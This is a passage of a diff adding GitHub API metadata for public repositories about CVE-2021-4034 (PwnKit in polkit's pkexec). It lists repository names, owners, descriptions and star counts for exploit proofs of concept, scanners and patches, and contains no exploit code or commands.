Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-28T13:06:45Z", + "updated_at": "2022-02-08T22:36:49Z", + "pushed_at": "2022-02-08T22:40:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453080818, + "name": "CVE-2021-4034", + "full_name": "Sakura-nee\/CVE-2021-4034", + "owner": { + "login": "Sakura-nee", + "id": 74785477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74785477?v=4", + "html_url": "https:\/\/github.com\/Sakura-nee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sakura-nee\/CVE-2021-4034", + "description": "CVE-2021-4034", + "fork": false, + "created_at": "2022-01-28T13:38:24Z", + "updated_at": "2022-01-28T13:42:53Z", + "pushed_at": "2022-06-02T21:17:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453085145, + "name": "pwnkit", + "full_name": "oreosec\/pwnkit", + "owner": { + "login": "oreosec", + "id": 40876702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40876702?v=4", + "html_url": "https:\/\/github.com\/oreosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oreosec\/pwnkit", + "description": "CVE-2021-4034", + "fork": false, + "created_at": "2022-01-28T13:51:17Z", + "updated_at": "2023-02-11T15:29:59Z", + "pushed_at": "2022-01-28T13:59:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453089649, + "name": "CVE-2021-4034-POC", + "full_name": "CYB3RK1D\/CVE-2021-4034-POC", + "owner": { + "login": "CYB3RK1D", + "id": 37270599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37270599?v=4", + "html_url": "https:\/\/github.com\/CYB3RK1D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYB3RK1D\/CVE-2021-4034-POC", + "description": "pwnkit", + "fork": false, + "created_at": "2022-01-28T14:04:58Z", + "updated_at": "2022-03-15T18:31:39Z", + "pushed_at": "2022-04-08T17:26:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453113353, + "name": "CVE-2021-4034", + "full_name": "Rvn0xsy\/CVE-2021-4034", + "owner": { + "login": "Rvn0xsy", + "id": 19944759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19944759?v=4", + "html_url": "https:\/\/github.com\/Rvn0xsy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rvn0xsy\/CVE-2021-4034", + "description": "CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation", + "fork": false, + "created_at": "2022-01-28T15:13:28Z", + "updated_at": "2024-08-12T20:20:08Z", + "pushed_at": "2022-01-28T15:37:41Z", + "stargazers_count": 96, + "watchers_count": 96, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 96, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 453114485, + "name": "CVE-2021-4034", + "full_name": "Kirill89\/CVE-2021-4034", + "owner": { + "login": "Kirill89", + "id": 2003936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4", + "html_url": "https:\/\/github.com\/Kirill89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kirill89\/CVE-2021-4034", + "description": "pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034", + "fork": false, + "created_at": "2022-01-28T15:16:44Z", + "updated_at": "2024-03-28T09:35:58Z", + "pushed_at": "2022-01-28T15:17:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 453145579, + "name": "CVE-2021-4034", + "full_name": "qq224015\/CVE-2021-4034", + "owner": { + "login": "qq224015", + "id": 17867645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17867645?v=4", + "html_url": "https:\/\/github.com\/qq224015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qq224015\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-28T16:50:45Z", + "updated_at": "2022-01-28T16:50:45Z", + "pushed_at": "2022-01-28T16:50:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453170577, + "name": "CVE-2021-4034", + "full_name": "NeonWhiteRabbit\/CVE-2021-4034", + "owner": { + "login": "NeonWhiteRabbit", + "id": 97998625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97998625?v=4", + "html_url": "https:\/\/github.com\/NeonWhiteRabbit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeonWhiteRabbit\/CVE-2021-4034", + "description": "Pwnkit Exploit (CVE-2021-4034), no download capabilty? Copy and paste it!", + "fork": false, + "created_at": "2022-01-28T18:12:54Z", + "updated_at": "2024-11-04T23:39:24Z", + "pushed_at": "2022-01-28T18:22:53Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453248251, + "name": "PwnKit-CVE-2021-4034", + "full_name": "glowbase\/PwnKit-CVE-2021-4034", + "owner": { + "login": "glowbase", + "id": 45991010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45991010?v=4", + "html_url": "https:\/\/github.com\/glowbase", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glowbase\/PwnKit-CVE-2021-4034", + "description": "PwnKit PoC - Local privilege escalation vulnerability for polkit's pkexec utility", + "fork": false, + "created_at": "2022-01-28T23:36:36Z", + "updated_at": "2022-02-06T01:20:03Z", + "pushed_at": "2022-02-06T01:20:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453321788, + "name": "polkit-0.96-CVE-2021-4034", + "full_name": "sofire\/polkit-0.96-CVE-2021-4034", + "owner": { + "login": "sofire", + "id": 1177330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1177330?v=4", + "html_url": "https:\/\/github.com\/sofire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sofire\/polkit-0.96-CVE-2021-4034", + "description": "centos 6.10 rpm for fix polkit CVE-2021-4034; centos 6.10的rpm包,修复CVE-2021-4034 漏洞", + "fork": false, + "created_at": "2022-01-29T06:54:49Z", + "updated_at": "2023-09-14T08:12:53Z", + "pushed_at": "2022-01-29T08:09:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "polkit" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453347135, + "name": "pwnkit-scanner", + "full_name": "codiobert\/pwnkit-scanner", + "owner": { + "login": "codiobert", + "id": 10519412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10519412?v=4", + "html_url": "https:\/\/github.com\/codiobert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codiobert\/pwnkit-scanner", + "description": "Check CVE-2021-4034 vulnerability", + "fork": false, + "created_at": "2022-01-29T09:03:34Z", + "updated_at": "2022-01-30T16:36:54Z", + "pushed_at": "2022-01-30T16:50:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 453431266, + "name": "CVE-2021-4034", + "full_name": "v-rzh\/CVE-2021-4034", + "owner": { + "login": "v-rzh", + "id": 81850032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81850032?v=4", + "html_url": "https:\/\/github.com\/v-rzh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v-rzh\/CVE-2021-4034", + "description": "Exploit for the PwnKit Vulnerability", + "fork": false, + "created_at": "2022-01-29T15:07:50Z", + "updated_at": "2022-01-29T15:17:29Z", + "pushed_at": "2022-01-30T12:58:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "exploit", + "pwnkit" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453504555, + "name": "PwnKit-Vulnerability_CVE-2021-4034", + "full_name": "TW-D\/PwnKit-Vulnerability_CVE-2021-4034", + "owner": { + "login": "TW-D", + "id": 75358550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75358550?v=4", + "html_url": "https:\/\/github.com\/TW-D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TW-D\/PwnKit-Vulnerability_CVE-2021-4034", + "description": "PwnKit - Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-29T19:59:24Z", + "updated_at": "2022-01-29T20:01:43Z", + "pushed_at": "2022-01-30T07:26:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 453510021, + "name": "ez-pwnkit", + "full_name": "OXDBXKXO\/ez-pwnkit", + "owner": { + "login": "OXDBXKXO", + "id": 18035000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18035000?v=4", + "html_url": "https:\/\/github.com\/OXDBXKXO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OXDBXKXO\/ez-pwnkit", + "description": "Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-29T20:24:43Z", + "updated_at": "2024-10-15T12:47:42Z", + "pushed_at": "2022-02-23T21:54:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-4034", + "exploit", + "go", + "golang", + "golang-package", + "linux", + "local-privilege-escalation", + "lpe", + "pkexec", + "pwnkit" + ], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453521330, + "name": "dissecting-pkexec-cve-2021-4034", + "full_name": "milot\/dissecting-pkexec-cve-2021-4034", + "owner": { + "login": "milot", + "id": 116471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116471?v=4", + "html_url": "https:\/\/github.com\/milot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/milot\/dissecting-pkexec-cve-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-01-29T21:20:14Z", + "updated_at": "2022-01-30T10:27:02Z", + "pushed_at": "2022-01-30T10:25:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453533841, + "name": "CVE-2021-4034-", + "full_name": "0x01-sec\/CVE-2021-4034-", + "owner": { + "login": "0x01-sec", + "id": 93550527, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93550527?v=4", + "html_url": "https:\/\/github.com\/0x01-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x01-sec\/CVE-2021-4034-", + "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-29T22:28:52Z", + "updated_at": "2022-12-07T16:48:03Z", + "pushed_at": "2022-01-29T23:29:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453575588, + "name": "CVE-2021-4034-PwnKit", + "full_name": "navisec\/CVE-2021-4034-PwnKit", + "owner": { + "login": "navisec", + "id": 82182980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82182980?v=4", + "html_url": "https:\/\/github.com\/navisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/navisec\/CVE-2021-4034-PwnKit", + "description": "PwnKit PoC for Polkit pkexec CVE-2021-4034 ", + "fork": false, + "created_at": "2022-01-30T03:08:51Z", + "updated_at": "2024-05-24T08:48:55Z", + "pushed_at": "2022-01-30T04:48:57Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 453650253, + "name": "pkexec-exploit", + "full_name": "Almorabea\/pkexec-exploit", + "owner": { + "login": "Almorabea", + "id": 13198863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13198863?v=4", + "html_url": "https:\/\/github.com\/Almorabea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Almorabea\/pkexec-exploit", + "description": "pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)", + "fork": false, + "created_at": "2022-01-30T10:34:28Z", + "updated_at": "2024-11-09T04:05:38Z", + "pushed_at": "2022-01-30T10:44:34Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 453933411, + "name": "Polkit-pkexec-exploit-for-Linux", + "full_name": "teelrabbit\/Polkit-pkexec-exploit-for-Linux", + "owner": { + "login": "teelrabbit", + "id": 55339121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55339121?v=4", + "html_url": "https:\/\/github.com\/teelrabbit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teelrabbit\/Polkit-pkexec-exploit-for-Linux", + "description": "CVE-2021-4034", + "fork": false, + "created_at": "2022-01-31T08:44:12Z", + "updated_at": "2022-01-31T08:57:24Z", + "pushed_at": "2022-01-31T08:57:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 454373696, + "name": "PoC-CVE-2021-4034", + "full_name": "scent2d\/PoC-CVE-2021-4034", + "owner": { + "login": "scent2d", + "id": 45614318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45614318?v=4", + "html_url": "https:\/\/github.com\/scent2d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scent2d\/PoC-CVE-2021-4034", + "description": "Pwnkit CVE-2021-4034", + "fork": false, + "created_at": "2022-02-01T12:11:19Z", + "updated_at": "2022-02-01T12:34:47Z", + "pushed_at": "2022-02-01T12:37:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 454654761, + "name": "CVE-2021-4034", + "full_name": "HrishitJoshi\/CVE-2021-4034", + "owner": { + "login": "HrishitJoshi", + "id": 60515873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60515873?v=4", + "html_url": "https:\/\/github.com\/HrishitJoshi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HrishitJoshi\/CVE-2021-4034", + "description": "PWNKIT - Local Privilege Escalation Vulnerability on Linux (Polkit)", + "fork": false, + "created_at": "2022-02-02T05:31:42Z", + "updated_at": "2022-02-02T05:38:06Z", + "pushed_at": "2022-02-02T05:37:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 454711252, + "name": "CVE-2021-4034", + "full_name": "Ankit-Ojha16\/CVE-2021-4034", + "owner": { + "login": "Ankit-Ojha16", + "id": 60637916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60637916?v=4", + "html_url": "https:\/\/github.com\/Ankit-Ojha16", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ankit-Ojha16\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-02-02T09:26:24Z", + "updated_at": "2022-02-02T09:27:18Z", + "pushed_at": "2022-02-02T09:27:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 455010051, + "name": "CVE-2021-4034", + "full_name": "G01d3nW01f\/CVE-2021-4034", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-4034", + "description": "PwnKit auto generate and Serve", + "fork": false, + "created_at": "2022-02-03T02:52:20Z", + "updated_at": "2023-01-11T15:11:03Z", + "pushed_at": "2022-02-03T03:32:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 455445970, + "name": "pwnKit", + "full_name": "drapl0n\/pwnKit", + "owner": { + "login": "drapl0n", + "id": 87269662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87269662?v=4", + "html_url": "https:\/\/github.com\/drapl0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drapl0n\/pwnKit", + "description": "pwnKit: Privilege Escalation USB-Rubber-Ducky payload, which exploits CVE-2021-4034 in less than 10sec's and spawns root shell for you.", + "fork": false, + "created_at": "2022-02-04T06:33:24Z", + "updated_at": "2024-08-12T20:20:18Z", + "pushed_at": "2022-02-08T04:57:32Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "exploit", + "hak5-ducky", + "payload" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 455655673, + "name": "CVE-2021-4034", + "full_name": "rvizx\/CVE-2021-4034", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2021-4034", + "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec in Python", + "fork": false, + "created_at": "2022-02-04T18:31:15Z", + "updated_at": "2024-09-06T10:03:20Z", + "pushed_at": "2022-07-19T12:52:30Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2021-4034", + "cybersecurity", + "python3" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 456253867, + "name": "Polkit-CVE-2021-4034-HLP", + "full_name": "Joffr3y\/Polkit-CVE-2021-4034-HLP", + "owner": { + "login": "Joffr3y", + "id": 16297240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16297240?v=4", + "html_url": "https:\/\/github.com\/Joffr3y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Joffr3y\/Polkit-CVE-2021-4034-HLP", + "description": "Polkit CVE-2021-4034 exploitation in High-Level Programming Language", + "fork": false, + "created_at": "2022-02-06T19:42:59Z", + "updated_at": "2022-02-08T21:24:56Z", + "pushed_at": "2022-02-09T07:30:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-4034", + "exploit", + "php", + "polkit", + "python", + "reverse-shell", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 456722456, + "name": "polkit_CVE-2021-4034", + "full_name": "ziadsaleemi\/polkit_CVE-2021-4034", + "owner": { + "login": "ziadsaleemi", + "id": 23222825, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23222825?v=4", + "html_url": "https:\/\/github.com\/ziadsaleemi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ziadsaleemi\/polkit_CVE-2021-4034", + "description": "Ansible role to patch RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034)", + "fork": false, + "created_at": "2022-02-08T00:09:31Z", + "updated_at": "2022-02-08T00:09:31Z", + "pushed_at": "2022-02-08T18:24:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 456760928, + "name": "Pwnkit-go", + "full_name": "FDlucifer\/Pwnkit-go", + "owner": { + "login": "FDlucifer", + "id": 45672104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45672104?v=4", + "html_url": "https:\/\/github.com\/FDlucifer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FDlucifer\/Pwnkit-go", + "description": "A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......)", + "fork": false, + "created_at": "2022-02-08T02:57:12Z", + "updated_at": "2024-08-12T20:20:25Z", + "pushed_at": "2022-02-08T03:24:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458040775, + "name": "cve-2021-4034", + "full_name": "cspshivam\/cve-2021-4034", + "owner": { + "login": "cspshivam", + "id": 59191514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59191514?v=4", + "html_url": "https:\/\/github.com\/cspshivam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cspshivam\/cve-2021-4034", + "description": "pwnkit exploit", + "fork": false, + "created_at": "2022-02-11T04:06:21Z", + "updated_at": "2022-02-15T07:07:15Z", + "pushed_at": "2022-02-15T07:09:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458439369, + "name": "CVE-2021-4034", + "full_name": "an0n7os\/CVE-2021-4034", + "owner": { + "login": "an0n7os", + "id": 67602602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67602602?v=4", + "html_url": "https:\/\/github.com\/an0n7os", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/an0n7os\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-02-12T06:20:49Z", + "updated_at": "2022-02-12T06:26:41Z", + "pushed_at": "2022-02-12T06:26:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458669265, + "name": "pwncat_pwnkit", + "full_name": "DanaEpp\/pwncat_pwnkit", + "owner": { + "login": "DanaEpp", + "id": 11337016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11337016?v=4", + "html_url": "https:\/\/github.com\/DanaEpp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanaEpp\/pwncat_pwnkit", + "description": "pwncat module that automatically exploits CVE-2021-4034 (pwnkit)", + "fork": false, + "created_at": "2022-02-13T00:05:32Z", + "updated_at": "2024-06-01T16:40:19Z", + "pushed_at": "2022-02-13T00:58:32Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 458791188, + "name": "CVE-2021-4034", + "full_name": "x04000\/CVE-2021-4034", + "owner": { + "login": "x04000", + "id": 78761999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78761999?v=4", + "html_url": "https:\/\/github.com\/x04000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x04000\/CVE-2021-4034", + "description": "A simple PWNKIT file to convert you to root ", + "fork": false, + "created_at": "2022-02-13T11:37:43Z", + "updated_at": "2022-02-18T09:29:16Z", + "pushed_at": "2022-02-16T19:12:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 458839212, + "name": "AutoPwnkit", + "full_name": "x04000\/AutoPwnkit", + "owner": { + "login": "x04000", + "id": 78761999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78761999?v=4", + "html_url": "https:\/\/github.com\/x04000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x04000\/AutoPwnkit", + "description": "A tool to automate the exploit PWNKIT (CVE-2021-4034)", + "fork": false, + "created_at": "2022-02-13T14:51:47Z", + "updated_at": "2023-08-23T17:21:23Z", + "pushed_at": "2022-02-13T15:04:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459341469, + "name": "codeql-sample-polkit", + "full_name": "hohn\/codeql-sample-polkit", + "owner": { + "login": "hohn", + "id": 2253228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253228?v=4", + "html_url": "https:\/\/github.com\/hohn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hohn\/codeql-sample-polkit", + "description": "All stages of exploring the polkit CVE-2021-4034 using codeql", + "fork": false, + "created_at": "2022-02-14T22:09:44Z", + "updated_at": "2024-11-19T10:44:22Z", + "pushed_at": "2022-03-15T18:42:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 459400421, + "name": "CVE-2021-4034", + "full_name": "ck00004\/CVE-2021-4034", + "owner": { + "login": "ck00004", + "id": 22369720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22369720?v=4", + "html_url": "https:\/\/github.com\/ck00004", + "user_view_type": "public" + }, + "html_url": 